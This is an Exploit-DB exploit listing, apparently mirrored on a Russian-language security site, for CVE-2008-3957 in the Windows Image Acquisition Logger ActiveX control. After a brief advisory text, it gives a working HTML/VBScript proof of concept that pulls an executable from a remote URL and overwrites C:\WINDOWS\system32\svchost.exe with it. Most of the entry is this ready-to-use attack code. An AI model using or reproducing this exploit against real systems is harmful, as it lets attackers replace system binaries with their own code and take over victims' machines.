- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 32344
- Проверка EDB
-
- Пройдено
- Автор
- CIPH3R
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2008-3957
- Дата публикации
- 2008-09-08
Код:
source: https://www.securityfocus.com/bid/31069/info
Microsoft Windows Image Acquisition Logger ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content. The issue occurs because the control fails to sanitize user-supplied input.
An attacker can exploit this issue to overwrite files with attacker-supplied data, which will aid in further attacks.
<object classid="clsid:A1E75357-881A-419E-83E2-BB16DB197C68" id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
dim remURL
remURL = "http://victim.com/svchost.exe"
test.Open remURL, True
test.Save "C:\WINDOWS\system32\svchost.exe", True
End Sub
</script>- Источник
- www.exploit-db.com
